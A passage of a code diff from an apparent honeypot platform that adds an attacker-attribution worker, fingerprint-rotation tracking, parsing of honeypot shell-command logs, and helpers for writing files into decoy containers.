      the number of adjacent repeats, with the repeat count floored at 1.
    """
    tail = observations[-_T.CATEGORICAL_WINDOW_N:]
    if len(tail) < 4:
        return False
    seq = [obs.get("value") for obs in tail]
    if len(set(seq)) != 2:
        return False
    flips = 0
    for earlier, later in zip(seq, seq[1:]):
        if later != earlier:
            flips += 1
    repeats = len(seq) - 1 - flips
    return flips >= 2 * max(repeats, 1)
|
||||||
|
|
||||||
|
|
||||||
|
def _unknown(last_ts: float, *, count: int) -> AttributionState:
    """Build the ``unknown`` state: no value, zero confidence.

    *last_ts* and *count* are passed straight through as
    ``last_observation_ts`` and ``observation_count``.
    """
    fields: dict[str, Any] = {
        "current_value": None,
        "state": "unknown",
        "confidence": 0.0,
        "observation_count": count,
        "last_observation_ts": last_ts,
    }
    return AttributionState(**fields)
|
||||||
394
decnet/correlation/attribution_worker.py
Normal file
394
decnet/correlation/attribution_worker.py
Normal file
@@ -0,0 +1,394 @@
|
|||||||
|
"""Attribution-engine bus subscriber (v0).

Subscribes to ``attacker.observation.>`` and, for each event, ensures
the source attacker has a stub identity in ``attacker_identities``,
re-runs the merger over that identity's observation series for the
primitive, upserts the resulting ``attribution_state`` row, and
publishes ``attribution.profile.state_changed`` when the state
transitions. A periodic tick additionally publishes
``attribution.profile.multi_actor_suspected``.
|
||||||
|
|
||||||
|
Pattern mirrors :mod:`decnet.correlation.reuse_worker`: bus-subscribe
|
||||||
|
with a wake event, fall back to poll-only if the bus is unavailable,
|
||||||
|
publish derived events with :func:`publish_safely`, log per-handler
|
||||||
|
exceptions and continue.
|
||||||
|
|
||||||
|
Trigger isolation: the per-event handler is wrapped in a single
|
||||||
|
try/except. Any exception is logged and the loop continues with the
|
||||||
|
next event. This is the same posture BEHAVE-SHELL's
|
||||||
|
``_handler.handle_session_ended`` adopts.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import asyncio
|
||||||
|
import contextlib
|
||||||
|
from typing import Any
|
||||||
|
|
||||||
|
from decnet.bus import topics as _topics
|
||||||
|
from decnet.bus.base import BaseBus
|
||||||
|
from decnet.bus.factory import get_bus
|
||||||
|
from decnet.bus.publish import (
|
||||||
|
publish_safely,
|
||||||
|
run_control_listener_signal as _run_control_listener_signal,
|
||||||
|
run_health_heartbeat as _run_health_heartbeat,
|
||||||
|
)
|
||||||
|
from decnet.correlation.attribution import _thresholds as _T
|
||||||
|
from decnet.correlation.attribution.aggregate import aggregate_observations
|
||||||
|
from decnet.logging import get_logger
|
||||||
|
from decnet.web.db.repository import BaseRepository
|
||||||
|
|
||||||
|
try:
|
||||||
|
from behave_shell.spec import (
|
||||||
|
PRIMITIVE_REGISTRY,
|
||||||
|
ValueKind,
|
||||||
|
)
|
||||||
|
_BEHAVE_REGISTRY_AVAILABLE = True
|
||||||
|
except ImportError: # pragma: no cover
|
||||||
|
PRIMITIVE_REGISTRY = {}
|
||||||
|
ValueKind = None
|
||||||
|
_BEHAVE_REGISTRY_AVAILABLE = False
|
||||||
|
|
||||||
|
# Module-level logger used by every function in this worker.
log = get_logger("correlation.attribution_worker")

# Short worker name: prefixes the bus client name and is handed to the
# health-heartbeat and control-listener helpers.
_WORKER_NAME = "attribution"
# Bus subscription pattern the observation consumer listens on; built
# from the topic constants and ending in the ``>`` wildcard.
_OBSERVATION_PATTERN = f"{_topics.ATTACKER}.{_topics.ATTACKER_OBSERVATION_PREFIX}.>"
|
||||||
|
|
||||||
|
|
||||||
|
async def run_attribution_loop(
    repo: BaseRepository,
    *,
    shutdown: asyncio.Event | None = None,
    multi_actor_tick_secs: float | None = None,
) -> None:
    """Supervise the attribution worker until it is told to stop.

    After connecting to the bus, four background tasks are started:

    1. ``_consume_observations`` — subscription on
       ``attacker.observation.>``; each event goes through
       :func:`handle_observation_event`.
    2. ``_multi_actor_tick_loop`` — periodic pass that can publish
       ``attribution.profile.multi_actor_suspected``.
    3. The health heartbeat.
    4. The control listener.

    If obtaining or connecting the bus raises, a warning is logged, no
    further tasks are started, and the function simply waits for
    shutdown.

    Args:
        repo: Repository handed to the consumer and tick tasks.
        shutdown: Optional external stop signal. When omitted, a private
            event is created that nothing sets, so the loop ends only
            through cancellation.
        multi_actor_tick_secs: Overrides
            ``_thresholds.MULTI_ACTOR_TICK_SECS`` (useful in tests to
            avoid waiting a full interval).

    On exit every started task is cancelled and awaited (errors
    suppressed), then the bus is closed (errors suppressed).
    Cancellation or ``KeyboardInterrupt`` while waiting is logged and
    not re-raised.
    """
    log.info("attribution worker started pattern=%s", _OBSERVATION_PATTERN)

    bus: BaseBus | None = None
    # Task handles in creation order; teardown cancels them in this order.
    tasks: list[asyncio.Task] = []
    interval = (
        _T.MULTI_ACTOR_TICK_SECS
        if multi_actor_tick_secs is None
        else multi_actor_tick_secs
    )
    try:
        candidate = get_bus(client_name=f"{_WORKER_NAME}-correlator")
        await candidate.connect()
        # Only a successfully connected bus is remembered for closing.
        bus = candidate
        tasks.append(asyncio.create_task(_consume_observations(bus, repo)))
        tasks.append(
            asyncio.create_task(_multi_actor_tick_loop(bus, repo, interval)),
        )
        tasks.append(
            asyncio.create_task(_run_health_heartbeat(bus, _WORKER_NAME)),
        )
        tasks.append(
            asyncio.create_task(_run_control_listener_signal(bus, _WORKER_NAME)),
        )
    except Exception as exc:  # noqa: BLE001
        log.warning(
            "attribution worker: bus unavailable, idle until bus returns: %s",
            exc,
        )

    stop_signal = shutdown if shutdown is not None else asyncio.Event()

    try:
        await stop_signal.wait()
    except (asyncio.CancelledError, KeyboardInterrupt):
        log.info("attribution worker stopped")
    finally:
        for task in tasks:
            task.cancel()
            with contextlib.suppress(asyncio.CancelledError, Exception):
                await task
        if bus is not None:
            with contextlib.suppress(Exception):
                await bus.close()
|
||||||
|
|
||||||
|
|
||||||
|
async def _consume_observations(
    bus: BaseBus, repo: BaseRepository,
) -> None:
    """Feed every event on ``attacker.observation.>`` to the handler.

    A failure while handling one event is logged with its traceback and
    the subscription keeps going, so one bad payload cannot stop the
    consumer. If the subscription itself raises, a warning is logged and
    this coroutine returns. Cancellation is propagated unchanged.
    """

    async def _dispatch(event: Any) -> None:
        # Per-event isolation boundary.
        try:
            await handle_observation_event(bus, repo, event)
        except Exception:  # noqa: BLE001
            log.exception("attribution worker: handler failed")

    try:
        subscription = bus.subscribe(_OBSERVATION_PATTERN)
        async with subscription:
            async for incoming in subscription:
                await _dispatch(incoming)
    except asyncio.CancelledError:
        raise
    except Exception as exc:  # noqa: BLE001
        log.warning(
            "attribution worker: subscriber for %s died (%s)",
            _OBSERVATION_PATTERN, exc,
        )
|
||||||
|
|
||||||
|
|
||||||
|
async def handle_observation_event(
    bus: BaseBus | None,
    repo: BaseRepository,
    event: Any,
) -> None:
    """Handle one ``attacker.observation.<primitive>`` event.

    Steps, in order:

    1. Read ``attacker_uuid`` and ``primitive`` from the payload; skip
       the event (debug log) when either is missing.
    2. Ensure a stub identity exists for the attacker; defer (info log)
       when the repository returns ``None``.
    3. Load the full observation series for ``(identity, primitive)``;
       return when it is empty.
    4. Run the merger selected by :func:`_value_kind_for`.
    5. Upsert the ``attribution_state`` row. ``last_change_ts`` is
       carried over from the prior row while the state is unchanged.
    6. On a state transition (including the first row) publish
       ``attribution.profile.state_changed`` when a bus is available,
       and log the transition.

    Args:
        bus: Bus used for the derived event; ``None`` disables
            publishing while persistence still happens.
        repo: Repository providing the identity, observation and state
            accessors used above.
        event: A bus event exposing a dict ``payload`` attribute, or a
            plain dict (see :func:`_payload_of`).
    """
    payload = _payload_of(event)
    attacker_uuid = payload.get("attacker_uuid")
    primitive = payload.get("primitive")
    if not attacker_uuid or not primitive:
        log.debug(
            "attribution worker: skipping malformed event (uuid=%r primitive=%r)",
            attacker_uuid, primitive,
        )
        return
    identity_uuid = await repo.ensure_stub_identity_for_attacker(
        str(attacker_uuid),
    )
    if identity_uuid is None:
        log.info(
            "attribution worker: no Attacker row for uuid=%s yet; deferring",
            attacker_uuid,
        )
        return
    primitive_str = str(primitive)

    # Load the full per-(identity, primitive) observation series.
    observations = await repo.observations_for_identity_primitive(
        identity_uuid, primitive_str,
    )
    if not observations:
        log.debug(
            "attribution worker: no observations yet for identity=%s "
            "primitive=%s (race with upsert)",
            identity_uuid, primitive_str,
        )
        return

    # Run the merger.
    value_kind = _value_kind_for(primitive_str)
    new_state = aggregate_observations(observations, value_kind=value_kind)

    # Load the prior state to detect transitions.
    prior = await repo.get_attribution_state(identity_uuid, primitive_str)
    old_state = prior.get("state") if prior else None
    state_changed = prior is None or prior.get("state") != new_state.state

    # last_change_ts stays pinned to the prior row while the state is
    # unchanged, so the "since" timestamp does not reset on every
    # observation. A prior row without a usable timestamp (missing or
    # None) falls back to the newest observation instead of raising.
    last_change_ts = new_state.last_observation_ts
    if prior is not None and not state_changed:
        prior_change_ts = prior.get("last_change_ts")
        if prior_change_ts is not None:
            last_change_ts = prior_change_ts
        last_change_ts = float(last_change_ts)

    await repo.upsert_attribution_state({
        "identity_uuid": identity_uuid,
        "primitive": primitive_str,
        "current_value": new_state.current_value,
        "state": new_state.state,
        "confidence": new_state.confidence,
        "observation_count": new_state.observation_count,
        "last_change_ts": last_change_ts,
        "last_observation_ts": new_state.last_observation_ts,
    })

    # Emit state_changed only on a transition, so re-processing the same
    # observations with the same merger output produces no event.
    if state_changed and bus is not None:
        await publish_safely(
            bus,
            _topics.attribution(_topics.ATTRIBUTION_PROFILE_STATE_CHANGED),
            {
                "identity_uuid": identity_uuid,
                "primitive": primitive_str,
                "old_state": old_state,
                "new_state": new_state.state,
                "current_value": new_state.current_value,
                "confidence": new_state.confidence,
                "observation_count": new_state.observation_count,
                "ts": new_state.last_observation_ts,
            },
            event_type=_topics.ATTRIBUTION_PROFILE_STATE_CHANGED,
        )
        log.info(
            "attribution worker: identity=%s primitive=%s %s -> %s confidence=%.2f",
            identity_uuid, primitive_str,
            old_state or "<new>", new_state.state,
            new_state.confidence,
        )
|
||||||
|
|
||||||
|
|
||||||
|
def _value_kind_for(primitive: str) -> str:
    """Map a BEHAVE primitive name to the merger tag used by the engine.

    The registry's ``ValueKind`` decides the tag:

    * ``NUMERIC`` -> ``"numeric"``
    * ``HASH`` -> ``"hash"``
    * every other kind -> ``"categorical"``

    ``"categorical"`` is also the answer when the BEHAVE registry could
    not be imported or the primitive is not registered.
    """
    fallback = "categorical"
    if not _BEHAVE_REGISTRY_AVAILABLE:
        return fallback
    spec = PRIMITIVE_REGISTRY.get(primitive)
    if spec is None or ValueKind is None:
        return fallback
    if spec.kind is ValueKind.NUMERIC:
        return "numeric"
    return "hash" if spec.kind is ValueKind.HASH else fallback
|
||||||
|
|
||||||
|
|
||||||
|
def _payload_of(event: Any) -> dict[str, Any]:
    """Return the dict payload carried by *event*.

    Accepts either an object with a ``payload`` attribute or a bare
    dict. Anything whose payload is not a dict yields an empty dict.
    """
    candidate = getattr(event, "payload", event)
    if isinstance(candidate, dict):
        return candidate
    return {}
|
||||||
|
|
||||||
|
|
||||||
|
async def _multi_actor_tick_loop(
    bus: BaseBus, repo: BaseRepository, interval_secs: float,
) -> None:
    """Run :func:`tick_multi_actor` forever, once every *interval_secs*.

    The dedupe map (identity uuid -> frozenset of primitives) is owned
    here and handed to every tick. It lives only in memory, so a worker
    restart starts with an empty map.

    A failing tick is logged with its traceback and the loop carries on
    after the usual sleep. Cancellation propagates to the caller.
    """
    fired_signatures: dict[str, frozenset[str]] = {}
    while True:
        try:
            await tick_multi_actor(bus, repo, fired_signatures)
        except Exception:  # noqa: BLE001
            log.exception("attribution worker: multi_actor tick failed")
        await asyncio.sleep(interval_secs)
|
||||||
|
|
||||||
|
|
||||||
|
async def tick_multi_actor(
    bus: BaseBus | None,
    repo: BaseRepository,
    last_fired: dict[str, frozenset[str]],
) -> int:
    """Run one pass of the cross-primitive correlator. Public for tests.

    For every identity returned by ``repo.list_multi_actor_identities()``
    that carries at least ``MULTI_ACTOR_MIN_PRIMITIVES`` primitives, an
    ``attribution.profile.multi_actor_suspected`` event is published
    unless the same primitive set was already recorded in *last_fired*.

    Args:
        bus: Bus to publish on. With ``None`` the dedupe map is still
            updated but nothing is published or counted.
        repo: Repository supplying the candidate identities.
        last_fired: Dedupe map, mutated in place: identity uuid ->
            frozenset of primitives recorded on the last pass that saw
            a new set. Identities that no longer qualify are removed so
            that a later qualifying set fires again.

    Returns:
        The number of ``multi_actor_suspected`` events handed to the
        publisher during this pass.
    """
    candidates = await repo.list_multi_actor_identities()
    fired = 0
    # Identities that qualify on this pass; everything else is re-armed.
    qualifying: set[str] = set()
    for entry in candidates:
        identity_uuid = str(entry["identity_uuid"])
        primitives: list[str] = sorted(entry.get("primitives") or [])
        if len(primitives) < _T.MULTI_ACTOR_MIN_PRIMITIVES:
            # Defensive threshold check. The identity is deliberately
            # NOT marked as qualifying, so any stale dedupe entry is
            # dropped below and the identity re-arms.
            continue
        qualifying.add(identity_uuid)
        signature = frozenset(primitives)
        if last_fired.get(identity_uuid) == signature:
            continue
        last_fired[identity_uuid] = signature
        if bus is None:
            continue
        await publish_safely(
            bus,
            _topics.attribution(_topics.ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED),
            {
                "identity_uuid": identity_uuid,
                "primitives": primitives,
                "evidence_summary": (
                    f"{len(primitives)} primitives flagged multi_actor"
                ),
                "confidence": _T.MULTI_ACTOR_MAX_CONFIDENCE,
                "ts": _now(),
            },
            event_type=_topics.ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED,
        )
        fired += 1
        log.info(
            "attribution worker: multi_actor_suspected identity=%s primitives=%s",
            identity_uuid, primitives,
        )
    # Re-arm: drop every remembered identity that did not qualify on
    # this pass, whether absent from the candidates or below threshold.
    for stale in [key for key in last_fired if key not in qualifying]:
        del last_fired[stale]
    return fired
|
||||||
|
|
||||||
|
|
||||||
|
def _now() -> float:
    """Return the current wall-clock time in seconds.

    Kept as a separate function so tests can monkeypatch it.
    """
    from time import time as _wall_clock

    return _wall_clock()
|
||||||
|
|
||||||
|
|
||||||
|
__all__ = [
|
||||||
|
"run_attribution_loop",
|
||||||
|
"handle_observation_event",
|
||||||
|
"tick_multi_actor",
|
||||||
|
]
|
||||||
153
decnet/correlation/fingerprint_rotation.py
Normal file
153
decnet/correlation/fingerprint_rotation.py
Normal file
@@ -0,0 +1,153 @@
|
|||||||
|
"""Attacker substrate-fingerprint rotation detection.
|
||||||
|
|
||||||
|
Called inline from the prober at each fingerprint emit site. Looks up
|
||||||
|
the last persisted hash for ``(attacker_uuid, port, probe_type)``;
|
||||||
|
when the new hash differs from the last one, emits a derived
|
||||||
|
``attacker.fingerprint_rotated`` event (bus + RFC 5424 syslog) and
|
||||||
|
stamps the ``Attacker`` row's rotation telemetry.
|
||||||
|
|
||||||
|
This is a pure library — no daemon, no async loop. The prober is the
|
||||||
|
only producer. We just teach it to derive a second event on hash
|
||||||
|
flip without standing up another worker (DEBT-032).
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import uuid as _uuid
|
||||||
|
from dataclasses import dataclass
|
||||||
|
from datetime import datetime
|
||||||
|
from typing import Any, Callable, Literal
|
||||||
|
|
||||||
|
from sqlmodel import Session, select
|
||||||
|
|
||||||
|
from decnet.web.db.models import Attacker, AttackerFingerprintState
|
||||||
|
|
||||||
|
# Probe families whose hashes are tracked per (attacker, port).
ProbeType = Literal["jarm", "hassh", "tcpfp"]
# Outcome tag reported by ``record_fingerprint``.
RotationKind = Literal[
    "no_attacker_row",  # caller raced ahead of correlator; skip silently
    "first_sighting",   # state row created, no prior hash
    "unchanged",        # same hash as last sighting
    "rotated",          # hash differs; event emitted, Attacker stamped
]

# Optional emit hooks. Both are called as ``fn(event_type, payload)``
# and their return value is ignored.
PublishFn = Callable[[str, dict[str, Any]], None]
SyslogFn = Callable[[str, dict[str, Any]], None]
|
||||||
|
|
||||||
|
|
||||||
|
@dataclass
class RotationOutcome:
    """Result returned by :func:`record_fingerprint`.

    Callers usually ignore it; it is mainly useful for tests and
    tracing.
    """
    # Which branch of record_fingerprint produced this outcome.
    kind: RotationKind
    # Previously stored hash; None when there was no Attacker row or no
    # prior state row.
    old_hash: str | None
    # Hash supplied by the caller for this sighting.
    new_hash: str
    # Rotation count of the per-(attacker, port, probe_type) state row;
    # 0 when no state row existed before this call.
    rotation_count: int
|
||||||
|
|
||||||
|
|
||||||
|
# Event type handed to both publish_fn and syslog_fn on a hash rotation.
_ROTATED_EVENT_TYPE = "attacker.fingerprint_rotated"
|
||||||
|
|
||||||
|
|
||||||
|
def record_fingerprint(
    session: Session,
    *,
    attacker_ip: str,
    port: int,
    probe_type: ProbeType,
    new_hash: str,
    ts: datetime,
    publish_fn: PublishFn | None = None,
    syslog_fn: SyslogFn | None = None,
) -> RotationOutcome:
    """Record a fingerprint sighting and emit a derived event on rotation.

    The attacker is resolved from *attacker_ip* through the ``Attacker``
    table, then the state row for ``(attacker_uuid, port, probe_type)``
    is looked up:

    * no ``Attacker`` row -> ``kind="no_attacker_row"``; nothing is
      written or emitted.
    * no state row -> one is created with ``rotation_count=0`` and
      committed; ``kind="first_sighting"``.
    * same hash -> ``last_seen`` is refreshed and committed;
      ``kind="unchanged"``.
    * different hash -> the state row and the ``Attacker`` rotation
      telemetry are updated, the hooks are called, and the transaction
      is committed; ``kind="rotated"``.

    On the rotation path the hooks run *before* the commit. If a hook or
    the commit raises, the pending changes are rolled back and the
    exception is re-raised, so a caller that reuses the session cannot
    later persist a rotation whose event was never emitted. An event
    emitted just before a failing commit cannot be recalled; the stored
    hash then stays unchanged, so the next sighting with the new hash
    reports the rotation again.

    Args:
        session: Open database session; this function commits on it.
        attacker_ip: Source IP used to find the ``Attacker`` row.
        port: Probed port.
        probe_type: Fingerprint family.
        new_hash: Hash observed by this probe.
        ts: Timestamp of the sighting.
        publish_fn: Optional hook called as ``fn(event_type, payload)``.
        syslog_fn: Optional hook with the same call shape.

    Returns:
        A :class:`RotationOutcome` describing which branch was taken.

    Raises:
        Exception: Whatever a hook or the commit raises on the rotation
            path, after the rollback.
    """
    attacker = session.exec(
        select(Attacker).where(Attacker.ip == attacker_ip)
    ).first()
    if attacker is None:
        return RotationOutcome(
            kind="no_attacker_row",
            old_hash=None,
            new_hash=new_hash,
            rotation_count=0,
        )

    row = session.exec(
        select(AttackerFingerprintState).where(
            AttackerFingerprintState.attacker_uuid == attacker.uuid,
            AttackerFingerprintState.port == port,
            AttackerFingerprintState.probe_type == probe_type,
        )
    ).first()

    if row is None:
        session.add(AttackerFingerprintState(
            uuid=str(_uuid.uuid4()),
            attacker_uuid=attacker.uuid,
            port=port,
            probe_type=probe_type,
            last_hash=new_hash,
            last_seen=ts,
            rotation_count=0,
        ))
        session.commit()
        return RotationOutcome(
            kind="first_sighting",
            old_hash=None,
            new_hash=new_hash,
            rotation_count=0,
        )

    if row.last_hash == new_hash:
        row.last_seen = ts
        session.add(row)
        session.commit()
        return RotationOutcome(
            kind="unchanged",
            old_hash=row.last_hash,
            new_hash=new_hash,
            rotation_count=row.rotation_count,
        )

    # Hash flipped: update the per-probe state and the attacker-level
    # rotation telemetry.
    old_hash = row.last_hash
    row.last_hash = new_hash
    row.last_seen = ts
    row.rotation_count += 1
    session.add(row)

    attacker.rotation_count += 1
    attacker.last_rotation_at = ts
    session.add(attacker)

    # Captured before the commit so the returned count is exactly the
    # one carried by the emitted payload.
    rotation_count = row.rotation_count
    payload: dict[str, Any] = {
        "attacker_uuid": attacker.uuid,
        "attacker_ip": attacker_ip,
        "port": port,
        "probe_type": probe_type,
        "old_hash": old_hash,
        "new_hash": new_hash,
        "rotation_count": rotation_count,
        "ts": ts.isoformat(),
    }

    try:
        if publish_fn is not None:
            publish_fn(_ROTATED_EVENT_TYPE, payload)
        if syslog_fn is not None:
            syslog_fn(_ROTATED_EVENT_TYPE, payload)
        session.commit()
    except Exception:
        # Discard the pending mutations before propagating the error.
        session.rollback()
        raise

    return RotationOutcome(
        kind="rotated",
        old_hash=old_hash,
        new_hash=new_hash,
        rotation_count=rotation_count,
    )
|
||||||
@@ -32,6 +32,21 @@ _RFC5424_RE = re.compile(
|
|||||||
r"(.+)$", # 5: SD element + optional MSG
|
r"(.+)$", # 5: SD element + optional MSG
|
||||||
)
|
)
|
||||||
|
|
||||||
|
# Honeypot SSH PROMPT_COMMAND lines arrive double-wrapped: the
|
||||||
|
# Docker-stdout collector envelope wraps the inner ``logger
|
||||||
|
# --rfc5424 --msgid command -t bash …`` line. Outer MSGID is NIL,
|
||||||
|
# real MSGID lives in the body. Mirrors the unwrap logic in
|
||||||
|
# ``decnet.collector.worker._INNER_RFC5424_RE`` — the two parsers
|
||||||
|
# read the same on-wire format.
|
||||||
|
_INNER_RFC5424_RE = re.compile(
|
||||||
|
r"^(\d{4}-\d{2}-\d{2}T\S+)\s+" # 1: inner TIMESTAMP
|
||||||
|
r"(\S+)\s+" # 2: inner HOSTNAME
|
||||||
|
r"(\S+)\s+" # 3: inner APP-NAME
|
||||||
|
r"\S+\s+" # PROCID (NIL or PID)
|
||||||
|
r"(\S+)\s+" # 4: inner MSGID
|
||||||
|
r"(.+)$", # 5: inner SD/MSG remainder
|
||||||
|
)
|
||||||
|
|
||||||
# Structured data block: [relay@55555 k="v" ...]
|
# Structured data block: [relay@55555 k="v" ...]
|
||||||
_SD_BLOCK_RE = re.compile(r'\[relay@55555\s+(.*?)\]', re.DOTALL)
|
_SD_BLOCK_RE = re.compile(r'\[relay@55555\s+(.*?)\]', re.DOTALL)
|
||||||
|
|
||||||
@@ -121,6 +136,21 @@ def parse_line(line: str) -> LogEvent | None:
|
|||||||
|
|
||||||
ts_raw, decky, service, event_type, sd_rest = m.groups()
|
ts_raw, decky, service, event_type, sd_rest = m.groups()
|
||||||
|
|
||||||
|
# Unwrap double-wrapped Docker-stdout envelopes around bash
|
||||||
|
# PROMPT_COMMAND lines. See ``_INNER_RFC5424_RE`` and the matching
|
||||||
|
# logic in ``decnet.collector.worker.parse_rfc5424``. Must run
|
||||||
|
# before the decky/service NIL-guard below — the OUTER decky is
|
||||||
|
# the docker host, the inner header carries the real source.
|
||||||
|
if event_type == "-" and sd_rest.startswith("-"):
|
||||||
|
body = sd_rest[1:].lstrip()
|
||||||
|
inner = _INNER_RFC5424_RE.match(body)
|
||||||
|
if inner is not None:
|
||||||
|
_i_ts, i_host, i_app, i_msgid, i_rest = inner.groups()
|
||||||
|
decky = i_host
|
||||||
|
service = i_app
|
||||||
|
event_type = i_msgid
|
||||||
|
sd_rest = i_rest
|
||||||
|
|
||||||
if decky == "-" or service == "-":
|
if decky == "-" or service == "-":
|
||||||
return None
|
return None
|
||||||
|
|
||||||
@@ -137,6 +167,19 @@ def parse_line(line: str) -> LogEvent | None:
|
|||||||
msg = tail.group(1).strip() if tail else ""
|
msg = tail.group(1).strip() if tail else ""
|
||||||
attacker_ip = _extract_attacker_ip(fields, msg)
|
attacker_ip = _extract_attacker_ip(fields, msg)
|
||||||
|
|
||||||
|
# Free-form bash PROMPT_COMMAND lines arrive with MSGID=NIL or MSGID=command
|
||||||
|
# and a body like `CMD uid=0 user=root src=… pwd=… cmd=<rest of line>`.
|
||||||
|
# Without this rewrite they're invisible to the behavioral profiler, which
|
||||||
|
# filters on event_type ∈ {command, exec, query, …}. The Dockerfile logger
|
||||||
|
# invocation uses --msgid command, so we must also handle the non-nil case.
|
||||||
|
if event_type in ("-", "command") and msg.startswith("CMD ") and "command" not in fields:
|
||||||
|
event_type = "command"
|
||||||
|
head, sep, cmd_rest = msg[4:].partition("cmd=")
|
||||||
|
for k, v in re.findall(r'(\w+)=(\S+)', head):
|
||||||
|
fields.setdefault(k, v)
|
||||||
|
if sep:
|
||||||
|
fields.setdefault("command", cmd_rest)
|
||||||
|
|
||||||
# Mutator-emitted transitions arrive on the same ingest stream but
|
# Mutator-emitted transitions arrive on the same ingest stream but
|
||||||
# belong in the substrate-state index, not the per-IP attacker one.
|
# belong in the substrate-state index, not the per-IP attacker one.
|
||||||
kind: EventKind = (
|
kind: EventKind = (
|
||||||
|
|||||||
@@ -70,7 +70,7 @@ async def run_reuse_loop(
|
|||||||
wake_tasks.append(asyncio.create_task(
|
wake_tasks.append(asyncio.create_task(
|
||||||
_run_control_listener_signal(bus, "reuse-correlator"),
|
_run_control_listener_signal(bus, "reuse-correlator"),
|
||||||
))
|
))
|
||||||
except Exception as exc: # noqa: BLE001
|
except Exception as exc:
|
||||||
log.warning(
|
log.warning(
|
||||||
"reuse correlator: bus unavailable, running in poll-only mode: %s",
|
"reuse correlator: bus unavailable, running in poll-only mode: %s",
|
||||||
exc,
|
exc,
|
||||||
@@ -86,7 +86,7 @@ async def run_reuse_loop(
|
|||||||
results = await engine.correlate_credential_reuse(
|
results = await engine.correlate_credential_reuse(
|
||||||
repo, min_targets=min_targets,
|
repo, min_targets=min_targets,
|
||||||
)
|
)
|
||||||
except Exception: # noqa: BLE001
|
except Exception:
|
||||||
log.exception("reuse correlator: tick failed")
|
log.exception("reuse correlator: tick failed")
|
||||||
results = []
|
results = []
|
||||||
|
|
||||||
@@ -120,11 +120,11 @@ async def run_reuse_loop(
|
|||||||
t.cancel()
|
t.cancel()
|
||||||
if heartbeat_task is not None:
|
if heartbeat_task is not None:
|
||||||
heartbeat_task.cancel()
|
heartbeat_task.cancel()
|
||||||
for t in (*wake_tasks, heartbeat_task):
|
for task in (*wake_tasks, heartbeat_task):
|
||||||
if t is None:
|
if task is None:
|
||||||
continue
|
continue
|
||||||
with contextlib.suppress(asyncio.CancelledError, Exception):
|
with contextlib.suppress(asyncio.CancelledError, Exception):
|
||||||
await t
|
await task
|
||||||
if bus is not None:
|
if bus is not None:
|
||||||
with contextlib.suppress(Exception):
|
with contextlib.suppress(Exception):
|
||||||
await bus.close()
|
await bus.close()
|
||||||
@@ -143,7 +143,7 @@ async def _wake_on(bus: BaseBus, wake: asyncio.Event, pattern: str) -> None:
|
|||||||
wake.set()
|
wake.set()
|
||||||
except asyncio.CancelledError:
|
except asyncio.CancelledError:
|
||||||
raise
|
raise
|
||||||
except Exception as exc: # noqa: BLE001
|
except Exception as exc:
|
||||||
log.warning(
|
log.warning(
|
||||||
"reuse correlator: subscriber for %s died (%s); falling back to poll",
|
"reuse correlator: subscriber for %s died (%s); falling back to poll",
|
||||||
pattern, exc,
|
pattern, exc,
|
||||||
|
|||||||
39
decnet/decky_io/__init__.py
Normal file
39
decnet/decky_io/__init__.py
Normal file
@@ -0,0 +1,39 @@
|
|||||||
|
"""Shared primitives for writing/deleting files inside running deckies.
|
||||||
|
|
||||||
|
The canary planter and the orchestrator SSH driver both need to drop
|
||||||
|
bytes into a decky container's filesystem, then sometimes unlink them.
|
||||||
|
The ARG_MAX-safe ``base64 -d``-via-stdin trick lived in two places
|
||||||
|
before this module existed.
|
||||||
|
|
||||||
|
Public API:
|
||||||
|
|
||||||
|
* :func:`write_file_to_container` — write bytes at a path, set mode,
|
||||||
|
optionally backdate mtime.
|
||||||
|
* :func:`delete_file_from_container` — best-effort ``rm -f``.
|
||||||
|
* :func:`resolve_topology_container` — pick the right docker container
|
||||||
|
for a MazeNET decky based on its services list.
|
||||||
|
* :func:`resolve_decky_container` — async helper that takes
|
||||||
|
``(decky_name, topology_id?)``, hydrates the topology when needed,
|
||||||
|
and returns the docker container name.
|
||||||
|
|
||||||
|
Container resolution conventions are documented in
|
||||||
|
:mod:`decnet.topology.compose`; we mirror them here without taking
|
||||||
|
a runtime dependency on the compose generator.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
from .resolve import (
|
||||||
|
resolve_decky_container,
|
||||||
|
resolve_topology_container,
|
||||||
|
)
|
||||||
|
from .write import (
|
||||||
|
delete_file_from_container,
|
||||||
|
write_file_to_container,
|
||||||
|
)
|
||||||
|
|
||||||
|
__all__ = [
|
||||||
|
"delete_file_from_container",
|
||||||
|
"resolve_decky_container",
|
||||||
|
"resolve_topology_container",
|
||||||
|
"write_file_to_container",
|
||||||
|
]
|
||||||
72
decnet/decky_io/resolve.py
Normal file
72
decnet/decky_io/resolve.py
Normal file
@@ -0,0 +1,72 @@
|
|||||||
|
"""Decky-name → docker container name resolution.
|
||||||
|
|
||||||
|
Two scopes:
|
||||||
|
|
||||||
|
* **Fleet**: every fleet decky has a ``ssh`` service container named
|
||||||
|
``<decky_name>-ssh`` (see :mod:`decnet.services.ssh`). We always
|
||||||
|
target it because it carries the most realistic filesystem layout.
|
||||||
|
* **MazeNET (topology)**: same ``<name>-ssh`` convention when the
|
||||||
|
decky exposes the ssh service; otherwise the decky's base container
|
||||||
|
named ``decnet_t_<topology_id8>_<decky_name>`` (matches
|
||||||
|
:func:`decnet.topology.compose._container_name`).
|
||||||
|
|
||||||
|
Keeping resolution centralised here means new ``docker exec`` callers
|
||||||
|
(file drops, future bulk planters, etc.) never need to learn the
|
||||||
|
naming conventions — they just call :func:`resolve_decky_container`.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
from typing import Any, Iterable, Optional
|
||||||
|
|
||||||
|
_SSH_CONTAINER_SUFFIX = "-ssh"
|
||||||
|
|
||||||
|
|
||||||
|
def resolve_topology_container(
    topology_id: str, decky_name: str, services: Iterable[str],
) -> str:
    """Return the docker container name for a MazeNET (topology) decky.

    Pure function, no I/O.

    Args:
        topology_id: Topology identifier; only its first 8 characters are
            used in the base-container name.
        decky_name: Name of the decky inside the topology.
        services: Service names the decky exposes. Consumed once, so a
            one-shot iterator is acceptable.

    Returns:
        ``<decky_name>-ssh`` when ``"ssh"`` is one of *services*, otherwise
        ``decnet_t_<topology_id[:8]>_<decky_name>``.
    """
    offered = frozenset(services)
    if "ssh" not in offered:
